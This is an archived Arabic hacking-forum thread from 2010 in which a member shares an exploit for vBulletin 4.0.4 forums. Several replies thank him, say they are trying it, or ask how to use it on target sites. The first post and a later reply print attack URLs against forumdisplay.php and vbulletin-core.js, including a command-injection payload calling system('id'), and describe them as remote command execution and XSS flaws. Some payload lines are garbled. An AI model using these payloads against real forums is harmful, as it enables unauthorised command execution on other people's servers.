المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : ثغرات خطيره في منتديات vbulletin 4.0.4



ASDELY-ScOrPiOn
08-26-2010, 04:56 PM
بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

اخواني الاعزاء اعضاء منتديات جيوش الهكرز الكرام

الثغره بسيطه جدا
رابط الثغره
http://www.exploit-db.com/exploits/14686/


/*================================================= =====================*\
|| ################################################## ################## ||
|| # Vurnerebility vBulletin - http://www.vbulletin.org # ||
|| # Local or adserver Javascript,forumdisplay.php" Code Execution # ||
|| # Version license 4.0.4 # ||
|| # info set cookies, error issue & critical-information-disclosure # ||
|| # Dork powered by vBulletin 4.0.4 # ||
|| # author mc2_s3lector # ||
|| # Contact|http://www.yogyacarderlink.web.id # ||
|| ################################################## ################## ||
\*================================================ ======================*/

http://DNSname.com/patch/clientscript/vbulletin-core.js?v=

http://DNSname.com/patch/clientscript/vbulletin-core.js?v=(value)

http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=

http://DNSname.com/patch/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."

http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=content-type=".allow put chart

/*================================================= =====================*\
|# ################################################## ################### |
# gretz: all family(www.yogyacarderlink.web.id) # |
|# v3n0m,m4rc0,eidelweis,Joglo,setanmuda,z0mb13,byeby e,93l4p_9uL1t@, # |
|# IdioT_InsidE,dewancc,craxboy90,lingga,horcux,artup as,s0ul_34t3r, # |
|# mywisdom,Travis,a9d1co0L,L4zyb0i,Jastis & all # |
|# KeDaiComputerworks.org # |
|# my bro one-d4y,elpaci4n0,Ariwira,h3ndry_Slank,raven_ville, t3j0,& all# |
|# Indesign Computer Care,logcode.net,flowerjingga,.alboraaq.com # |
| ################################################## ################### |
\*================================================ ======================*/

BL[4]Ck T!G3R
08-26-2010, 09:02 PM
مشكور جاري التجريب

Root Killer
08-27-2010, 01:11 AM
مشكوووور يا أستاذ ووواصل

darts
08-27-2010, 01:14 AM
ما فهمت شي ؟؟

She!! Access
08-28-2010, 02:49 PM
شكرا جزيلا على الثغرات
الإستغلال هو

http://DNSname.com/patch/clientscript/vbulletin-core.js?v=

http://DNSname.com/patch/clientscript/vbulletin-core.js?v=(value)

http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=

http://DNSname.com/patch/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."

http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=content-type=".allow put chart

والثغرات من نوقع Remote Command Excute و XSS
وهذه 3 ثغرات وليست ثغرة واحدة

بالتوفيق

ALONE
09-04-2010, 11:38 AM
تسلم يا غالي

black_dream
10-01-2010, 10:41 PM
طيب ممكن تشرح نعمل إيه بالإستغلال..؟
يعنى الرابط دا مثلا
http://DNSname.com/patch/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
نعمل فيه إيه بالظبط
إيه كلمة patch
نحط مكانها إيه.؟
وفى حاجه تاني هنغيرها ولا أسم الموقع (الدومين)+patch وبس..؟
والثغره فايدتها إيه
وألف شكر مقدما

Dr.a7
10-02-2010, 05:02 AM
مشكوووور يعطيك العافيه على الثغره جاري التجربه

Murad
10-02-2010, 08:13 AM
ارجو الشرح لكيفية الاستغلال
وشكراا لك اخي